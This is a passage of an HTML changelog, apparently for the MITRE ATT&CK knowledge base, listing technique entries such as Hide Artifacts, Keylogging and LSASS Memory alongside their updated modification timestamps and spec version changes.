15:12:00.722000+00:00</td></tr></tbody></table></details><hr><h4>[T1564.001] Hide Artifacts: Hidden Files and Directories</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:23:13.914000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1564.002] Hide Artifacts: Hidden Users</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:23:44.205000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.705000+00:00</td></tr></tbody></table></details><hr><h4>[T1564.003] Hide Artifacts: Hidden Window</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:23:51.965000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.716000+00:00</td></tr></tbody></table></details><hr><h4>[T1564] Hide Artifacts</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:17:25.231000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr></tbody></table></details><hr><h4>[T1665] Hide Infrastructure</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-22 03:57:22.646000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1574] Hijack Execution Flow</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 21:18:17.156000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr></tbody></table></details><hr><h4>[T1556.007] Modify Authentication Process: Hybrid Identity</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.922000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.633000+00:00</td></tr></tbody></table></details><hr><h4>[T1219.001] Remote Access Tools: IDE Tunneling</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-22 16:34:13.454000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.643000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1564.011] Hide Artifacts: Ignore Process Interrupts</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:24:37.027000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.630000+00:00</td></tr></tbody></table></details><hr><h4>[T1546.012] Event Triggered Execution: Image File Execution Options Injection</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 18:54:42.949000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.640000+00:00</td></tr></tbody></table></details><hr><h4>[T1684.001] Social Engineering: Impersonation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:50:04.400000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1070] Indicator Removal</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 15:10:02.929000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.643000+00:00</td></tr></tbody></table></details><hr><h4>[T1027.005] Obfuscated Files or Information: Indicator Removal from Tools</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:19:28.558000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr></tbody></table></details><hr><h4>[T1202] Indirect Command Execution</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:31:14.152000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.628000+00:00</td></tr></tbody></table></details><hr><h4>[T1105] Ingress Tool Transfer</h4><p><b>Current version</b>: 2.6</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:32.714000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1490] Inhibit System Recovery</h4><p><b>Current version</b>: 1.6</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:37.297000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.724000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1553.004] Subvert Trust Controls: Install Root Certificate</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.931000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.715000+00:00</td></tr></tbody></table></details><hr><h4>[T1218.004] System Binary Proxy Execution: InstallUtil</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:39:41.457000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr></tbody></table></details><hr><h4>[T1546.016] Event Triggered Execution: Installer Packages</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-15 19:59:13.167000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.721000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1559] Inter-Process Communication</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:13.194000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1491.001] Defacement: Internal Defacement</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:05.030000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.705000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1090.001] Proxy: Internal Proxy</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:37.574000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.724000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1534] Internal Spearphishing</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 14:23:56.376000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1036.001] Masquerading: Invalid Code Signature</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:38:13.564000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr></tbody></table></details><hr><h4>[T1027.018] Obfuscated Files or Information: Invisible Unicode</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 18:41:48.689000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1127.003] Trusted Developer Utilities Proxy Execution: JamPlus</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:45:43.373000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.645000+00:00</td></tr></tbody></table></details><hr><h4>[T1059.007] Command and Scripting Interpreter: JavaScript</h4><p><b>Current version</b>: 2.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:24.217000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1027.016] Obfuscated Files or Information: Junk Code Insertion</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:19:48.489000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.639000+00:00</td></tr></tbody></table></details><hr><h4>[T1001.001] Data Obfuscation: Junk Data</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:38.011000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.725000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1574.013] Hijack Execution Flow: KernelCallbackTable</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 23:01:58.951000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1555.001] Credentials from Password Stores: Keychain</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:29.756000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1056.001] Input Capture: Keylogging</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:21.756000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1027.012] Obfuscated Files or Information: LNK Icon Smuggling</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:20:54.005000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.690000+00:00</td></tr></tbody></table></details><hr><h4>[T1003.001] OS Credential Dumping: LSASS Memory</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:52.657000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.637000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1570] Lateral Tool Transfer</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:19.137000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.713000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1543.001] Create or Modify System Process: Launch Agent</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:25.367000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1608.005] Stage Capabilities: Link Target</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:03.552000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.683000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1222.002] File and Directory Permissions Modification: Linux and Mac Permissions</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:51:53.173000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1055.015] Process Injection: ListPlanting</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:28:31.388000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1087.001] Account Discovery: Local Account</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: 